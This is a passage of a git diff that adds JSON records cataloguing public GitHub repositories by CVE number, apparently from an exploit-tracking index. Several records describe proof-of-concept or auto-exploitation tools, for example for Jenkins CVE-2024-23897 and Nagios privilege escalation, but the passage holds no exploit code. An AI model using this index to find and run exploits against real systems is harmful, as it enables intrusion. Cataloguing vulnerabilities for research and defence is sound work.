"2024-07-28T19:16:13Z", + "updated_at": "2024-10-28T21:16:23Z", + "pushed_at": "2024-10-28T21:15:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851732460, + "name": "Jenkins-Exploit-CVE-2024-23897-Fsociety", + "full_name": "BinaryGoodBoy0101\/Jenkins-Exploit-CVE-2024-23897-Fsociety", + "owner": { + "login": "BinaryGoodBoy0101", + "id": 171997927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171997927?v=4", + "html_url": "https:\/\/github.com\/BinaryGoodBoy0101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BinaryGoodBoy0101\/Jenkins-Exploit-CVE-2024-23897-Fsociety", + "description": "exploit diseñado para aprovechar una vulnerabilidad crítica en Jenkins versiones <= 2.441. La vulnerabilidad, CVE-2024-23897, permite la lectura arbitraria de archivos a través del CLI de Jenkins, lo que puede llevar a la exposición de información sensible o incluso a la ejecución remota de código (RCE) bajo ciertas circunstancias.", + "fork": false, + "created_at": "2024-09-03T16:06:40Z", + "updated_at": "2024-09-03T16:06:41Z", + "pushed_at": "2024-09-03T16:06:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 854769953, + "name": "PBL05-CVE-Analsys", + "full_name": "ShieldAuth-PHP\/PBL05-CVE-Analsys", + "owner": { + "login": "ShieldAuth-PHP", + "id": 180364853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/180364853?v=4", + "html_url": "https:\/\/github.com\/ShieldAuth-PHP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShieldAuth-PHP\/PBL05-CVE-Analsys", + "description": "CVE-2024-23897 분석", + "fork": false, + "created_at": "2024-09-09T18:42:34Z", + "updated_at": "2024-09-09T18:43:25Z", + "pushed_at": "2024-09-09T18:42:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 865507408, + "name": "CVE-2024-23897", + "full_name": "verylazytech\/CVE-2024-23897", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-23897", + "description": "POC - Jenkins File Read Vulnerability - CVE-2024-23897", + "fork": false, + "created_at": "2024-09-30T16:38:28Z", + "updated_at": "2024-12-30T21:06:51Z", + "pushed_at": "2024-11-26T14:46:59Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2024-23897", + "cve-2024-23897", + "jenkins-file-read", + "poc-cve-2024-23897", + "unauthenticated-read", + "unauthenticated-read-files" + ], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 900230397, + "name": "CVE-2024-23897-Vulnerabilidad-Jenkins", + "full_name": "D1se0\/CVE-2024-23897-Vulnerabilidad-Jenkins", + "owner": { + "login": "D1se0", + "id": 164921056, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164921056?v=4", + "html_url": "https:\/\/github.com\/D1se0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D1se0\/CVE-2024-23897-Vulnerabilidad-Jenkins", + "description": null, + "fork": false, + "created_at": "2024-12-08T08:13:34Z", + "updated_at": "2024-12-08T08:46:39Z", + "pushed_at": "2024-12-08T08:46:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "auto-mount", + "cve-2024-23897", + "docker", + "docker-container", + "ethical-hacking", + "hacking", + "jenkins", + "laboratory" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 911010933, + "name": "jenkins-lfi", + "full_name": "Marouane133\/jenkins-lfi", + "owner": { + "login": "Marouane133", + "id": 164184419, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164184419?v=4", + "html_url": "https:\/\/github.com\/Marouane133", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Marouane133\/jenkins-lfi", + "description": "Jenkins CVE-2024-23897 POC : Arbitrary File Read Vulnerability Leading to RCE", + "fork": false, + "created_at": "2025-01-02T03:28:56Z", + "updated_at": "2025-01-03T02:56:41Z", + "pushed_at": "2025-01-03T02:56:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23995.json b/2024/CVE-2024-23995.json new file mode 100644 index 0000000000..e58b9f2471 --- /dev/null +++ b/2024/CVE-2024-23995.json @@ -0,0 +1,33 @@ +[ + { + "id": 853174519, + "name": "CVE-2024-23995", + "full_name": "EQSTLab\/CVE-2024-23995", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-23995", + "description": "PoC for CVE-2024-23995", + "fork": false, + "created_at": "2024-09-06T06:14:36Z", + "updated_at": "2024-09-06T06:15:04Z", + "pushed_at": "2024-09-06T06:15:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23997.json b/2024/CVE-2024-23997.json new file mode 100644 index 0000000000..13663c5493 --- /dev/null +++ b/2024/CVE-2024-23997.json @@ -0,0 +1,33 @@ +[ + { + "id": 853172003, + "name": "CVE-2024-23997", + "full_name": "EQSTLab\/CVE-2024-23997", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-23997", + "description": "PoC for CVE-2024-23997", + "fork": false, + "created_at": "2024-09-06T06:07:12Z", + "updated_at": "2024-09-06T06:10:23Z", + "pushed_at": "2024-09-06T06:10:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23998.json b/2024/CVE-2024-23998.json new file mode 100644 index 0000000000..ea16926087 --- /dev/null +++ b/2024/CVE-2024-23998.json @@ -0,0 +1,33 @@ +[ + { + "id": 853173399, + "name": "CVE-2024-23998", + "full_name": "EQSTLab\/CVE-2024-23998", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-23998", + "description": "PoC for CVE-2024-23998", + "fork": false, + "created_at": "2024-09-06T06:11:15Z", + "updated_at": "2024-09-06T06:11:57Z", + "pushed_at": "2024-09-06T06:11:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24034.json b/2024/CVE-2024-24034.json new file mode 100644 index 0000000000..a30a21865c --- /dev/null +++ b/2024/CVE-2024-24034.json @@ -0,0 +1,33 @@ +[ + { + "id": 753711004, + "name": "CVE-2024-24034", + "full_name": "ELIZEUOPAIN\/CVE-2024-24034", + "owner": { + "login": "ELIZEUOPAIN", + "id": 102467898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102467898?v=4", + "html_url": "https:\/\/github.com\/ELIZEUOPAIN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ELIZEUOPAIN\/CVE-2024-24034", + "description": null, + "fork": false, + "created_at": "2024-02-06T16:47:07Z", + "updated_at": "2024-02-09T08:21:07Z", + "pushed_at": "2024-02-06T17:09:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24035.json b/2024/CVE-2024-24035.json new file mode 100644 index 0000000000..3da700d7bd --- /dev/null +++ b/2024/CVE-2024-24035.json @@ -0,0 +1,33 @@ +[ + { + "id": 753765755, + "name": "CVE-2024-24035", + "full_name": "ELIZEUOPAIN\/CVE-2024-24035", + "owner": { + "login": "ELIZEUOPAIN", + "id": 102467898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102467898?v=4", + "html_url": "https:\/\/github.com\/ELIZEUOPAIN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ELIZEUOPAIN\/CVE-2024-24035", + "description": null, + "fork": false, + "created_at": "2024-02-06T18:49:34Z", + "updated_at": "2024-02-06T18:49:34Z", + "pushed_at": "2024-02-06T19:15:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24134.json b/2024/CVE-2024-24134.json new file mode 100644 index 0000000000..86fbc3da83 --- /dev/null +++ b/2024/CVE-2024-24134.json @@ -0,0 +1,33 @@ +[ + { + "id": 742531876, + "name": "CVE-2024-24134", + "full_name": "BurakSevben\/CVE-2024-24134", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24134", + "description": null, + "fork": false, + "created_at": "2024-01-12T17:31:15Z", + "updated_at": "2024-01-30T22:16:30Z", + "pushed_at": "2024-01-31T00:27:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24135.json b/2024/CVE-2024-24135.json new file mode 100644 index 0000000000..0dc804eaf2 --- /dev/null +++ b/2024/CVE-2024-24135.json @@ -0,0 +1,33 @@ +[ + { + "id": 742628195, + "name": "CVE-2024-24135", + "full_name": "BurakSevben\/CVE-2024-24135", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24135", + "description": null, + "fork": false, + "created_at": "2024-01-12T22:49:01Z", + "updated_at": "2024-01-30T22:34:13Z", + "pushed_at": "2024-01-31T00:28:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24136.json b/2024/CVE-2024-24136.json new file mode 100644 index 0000000000..460f906b79 --- /dev/null +++ b/2024/CVE-2024-24136.json @@ -0,0 +1,33 @@ +[ + { + "id": 742615317, + "name": "CVE-2024-24136", + "full_name": "BurakSevben\/CVE-2024-24136", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24136", + "description": null, + "fork": false, + "created_at": "2024-01-12T21:53:07Z", + "updated_at": "2024-01-30T22:51:47Z", + "pushed_at": "2024-01-31T00:29:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24137.json b/2024/CVE-2024-24137.json new file mode 100644 index 0000000000..6dec41596f --- /dev/null +++ b/2024/CVE-2024-24137.json @@ -0,0 +1,33 @@ +[ + { + "id": 742818106, + "name": "CVE-2024-24137", + "full_name": "BurakSevben\/CVE-2024-24137", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24137", + "description": null, + "fork": false, + "created_at": "2024-01-13T13:11:35Z", + "updated_at": "2024-01-30T23:07:02Z", + "pushed_at": "2024-01-31T00:29:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24138.json b/2024/CVE-2024-24138.json new file mode 100644 index 0000000000..bbe5481d92 --- /dev/null +++ b/2024/CVE-2024-24138.json @@ -0,0 +1,33 @@ +[ + { + "id": 742958060, + "name": "CVE-2024-24138", + "full_name": "BurakSevben\/CVE-2024-24138", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24138", + "description": null, + "fork": false, + "created_at": "2024-01-13T21:48:00Z", + "updated_at": "2024-01-30T23:12:31Z", + "pushed_at": "2024-01-31T00:30:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24139.json b/2024/CVE-2024-24139.json new file mode 100644 index 0000000000..3f8d51ed87 --- /dev/null +++ b/2024/CVE-2024-24139.json @@ -0,0 +1,33 @@ +[ + { + "id": 743331442, + "name": "CVE-2024-24139", + "full_name": "BurakSevben\/CVE-2024-24139", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24139", + "description": null, + "fork": false, + "created_at": "2024-01-15T01:48:55Z", + "updated_at": "2024-01-30T23:16:22Z", + "pushed_at": "2024-01-31T00:30:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24140.json b/2024/CVE-2024-24140.json new file mode 100644 index 0000000000..72e4d8201f --- /dev/null +++ b/2024/CVE-2024-24140.json @@ -0,0 +1,33 @@ +[ + { + "id": 746380106, + "name": "CVE-2024-24140", + "full_name": "BurakSevben\/CVE-2024-24140", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24140", + "description": null, + "fork": false, + "created_at": "2024-01-21T21:45:34Z", + "updated_at": "2024-01-30T23:22:08Z", + "pushed_at": "2024-01-31T00:25:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24141.json b/2024/CVE-2024-24141.json new file mode 100644 index 0000000000..51ed859735 --- /dev/null +++ b/2024/CVE-2024-24141.json @@ -0,0 +1,33 @@ +[ + { + "id": 746416963, + "name": "CVE-2024-24141", + "full_name": "BurakSevben\/CVE-2024-24141", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24141", + "description": null, + "fork": false, + "created_at": "2024-01-21T23:56:41Z", + "updated_at": "2024-01-30T23:44:32Z", + "pushed_at": "2024-01-31T00:32:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24142.json b/2024/CVE-2024-24142.json new file mode 100644 index 0000000000..77cec3b4d0 --- /dev/null +++ b/2024/CVE-2024-24142.json @@ -0,0 +1,33 @@ +[ + { + "id": 746424150, + "name": "CVE-2024-24142", + "full_name": "BurakSevben\/CVE-2024-24142", + "owner": { + "login": "BurakSevben", + "id": 117217689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4", + "html_url": "https:\/\/github.com\/BurakSevben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24142", + "description": null, + "fork": false, + "created_at": "2024-01-22T00:36:05Z", + "updated_at": "2024-01-30T23:44:46Z", + "pushed_at": "2024-01-31T00:33:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2432.json b/2024/CVE-2024-2432.json new file mode 100644 index 0000000000..406861b68b --- /dev/null +++ b/2024/CVE-2024-2432.json @@ -0,0 +1,33 @@ +[ + { + "id": 772189617, + "name": "CVE-2024-2432-PaloAlto-GlobalProtect-EoP", + "full_name": "Hagrid29\/CVE-2024-2432-PaloAlto-GlobalProtect-EoP", + "owner": { + "login": "Hagrid29", + "id": 97426612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97426612?v=4", + "html_url": "https:\/\/github.com\/Hagrid29", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hagrid29\/CVE-2024-2432-PaloAlto-GlobalProtect-EoP", + "description": null, + "fork": false, + "created_at": "2024-03-14T17:48:49Z", + "updated_at": "2024-11-20T16:30:42Z", + "pushed_at": "2024-03-14T17:49:48Z", + "stargazers_count": 57, + "watchers_count": 57, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 57, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24336.json b/2024/CVE-2024-24336.json new file mode 100644 index 0000000000..d2b2e47095 --- /dev/null +++ b/2024/CVE-2024-24336.json @@ -0,0 +1,33 @@ +[ + { + "id": 753635394, + "name": "CVE-2024-24336", + "full_name": "nitipoom-jar\/CVE-2024-24336", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2024-24336", + "description": null, + "fork": false, + "created_at": "2024-02-06T14:10:02Z", + "updated_at": "2024-02-06T14:55:25Z", + "pushed_at": "2024-02-06T15:01:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24337.json b/2024/CVE-2024-24337.json new file mode 100644 index 0000000000..58e0d6439d --- /dev/null +++ b/2024/CVE-2024-24337.json @@ -0,0 +1,33 @@ +[ + { + "id": 753703913, + "name": "CVE-2024-24337", + "full_name": "nitipoom-jar\/CVE-2024-24337", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2024-24337", + "description": null, + "fork": false, + "created_at": "2024-02-06T16:33:13Z", + "updated_at": "2024-02-06T16:33:45Z", + "pushed_at": "2024-02-06T16:33:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24386.json b/2024/CVE-2024-24386.json new file mode 100644 index 0000000000..80f70acd7d --- /dev/null +++ b/2024/CVE-2024-24386.json @@ -0,0 +1,33 @@ +[ + { + "id": 755087413, + "name": "CVE-2024-24386", + "full_name": "erick-duarte\/CVE-2024-24386", + "owner": { + "login": "erick-duarte", + "id": 59427098, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59427098?v=4", + "html_url": "https:\/\/github.com\/erick-duarte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erick-duarte\/CVE-2024-24386", + "description": null, + "fork": false, + "created_at": "2024-02-09T12:22:08Z", + "updated_at": "2024-02-21T21:16:43Z", + "pushed_at": "2024-02-15T13:58:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24396.json b/2024/CVE-2024-24396.json new file mode 100644 index 0000000000..56eb640798 --- /dev/null +++ b/2024/CVE-2024-24396.json @@ -0,0 +1,33 @@ +[ + { + "id": 752985066, + "name": "CVE-2024-24396", + "full_name": "trustcves\/CVE-2024-24396", + "owner": { + "login": "trustcves", + "id": 119938735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119938735?v=4", + "html_url": "https:\/\/github.com\/trustcves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trustcves\/CVE-2024-24396", + "description": null, + "fork": false, + "created_at": "2024-02-05T08:43:33Z", + "updated_at": "2024-02-05T08:43:33Z", + "pushed_at": "2024-02-05T09:02:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24397.json b/2024/CVE-2024-24397.json new file mode 100644 index 0000000000..0ce4225c0c --- /dev/null +++ b/2024/CVE-2024-24397.json @@ -0,0 +1,33 @@ +[ + { + "id": 752995551, + "name": "CVE-2024-24397", + "full_name": "trustcves\/CVE-2024-24397", + "owner": { + "login": "trustcves", + "id": 119938735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119938735?v=4", + "html_url": "https:\/\/github.com\/trustcves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trustcves\/CVE-2024-24397", + "description": null, + "fork": false, + "created_at": "2024-02-05T09:08:34Z", + "updated_at": "2024-02-11T09:13:35Z", + "pushed_at": "2024-02-05T09:20:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24398.json b/2024/CVE-2024-24398.json new file mode 100644 index 0000000000..22c81d65be --- /dev/null +++ b/2024/CVE-2024-24398.json @@ -0,0 +1,33 @@ +[ + { + "id": 752998286, + "name": "CVE-2024-24398", + "full_name": "trustcves\/CVE-2024-24398", + "owner": { + "login": "trustcves", + "id": 119938735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119938735?v=4", + "html_url": "https:\/\/github.com\/trustcves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trustcves\/CVE-2024-24398", + "description": null, + "fork": false, + "created_at": "2024-02-05T09:15:17Z", + "updated_at": "2024-02-05T09:15:17Z", + "pushed_at": "2024-02-05T09:19:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24401.json b/2024/CVE-2024-24401.json new file mode 100644 index 0000000000..ced263129f --- /dev/null +++ b/2024/CVE-2024-24401.json @@ -0,0 +1,33 @@ +[ + { + "id": 759519319, + "name": "CVE-2024-24401", + "full_name": "MAWK0235\/CVE-2024-24401", + "owner": { + "login": "MAWK0235", + "id": 90433993, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433993?v=4", + "html_url": "https:\/\/github.com\/MAWK0235", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MAWK0235\/CVE-2024-24401", + "description": "Auto exploitation tool for CVE-2024-24401. ", + "fork": false, + "created_at": "2024-02-18T20:05:46Z", + "updated_at": "2024-12-04T17:52:45Z", + "pushed_at": "2024-09-07T03:02:43Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24402.json b/2024/CVE-2024-24402.json new file mode 100644 index 0000000000..37a57ff9b6 --- /dev/null +++ b/2024/CVE-2024-24402.json @@ -0,0 +1,33 @@ +[ + { + "id": 759526495, + "name": "CVE-2024-24402", + "full_name": "MAWK0235\/CVE-2024-24402", + "owner": { + "login": "MAWK0235", + "id": 90433993, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433993?v=4", + "html_url": "https:\/\/github.com\/MAWK0235", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MAWK0235\/CVE-2024-24402", + "description": "Priv esc in Nagios 2024R1.01", + "fork": false, + "created_at": "2024-02-18T20:33:28Z", + "updated_at": "2024-03-27T02:02:51Z", + "pushed_at": "2024-02-18T20:37:55Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24409.json b/2024/CVE-2024-24409.json new file mode 100644 index 0000000000..9c51603b68 --- /dev/null +++ b/2024/CVE-2024-24409.json @@ -0,0 +1,33 @@ +[ + { + "id": 864565102, + "name": "CVE-2024-24409", + "full_name": "passtheticket\/CVE-2024-24409", + "owner": { + "login": "passtheticket", + 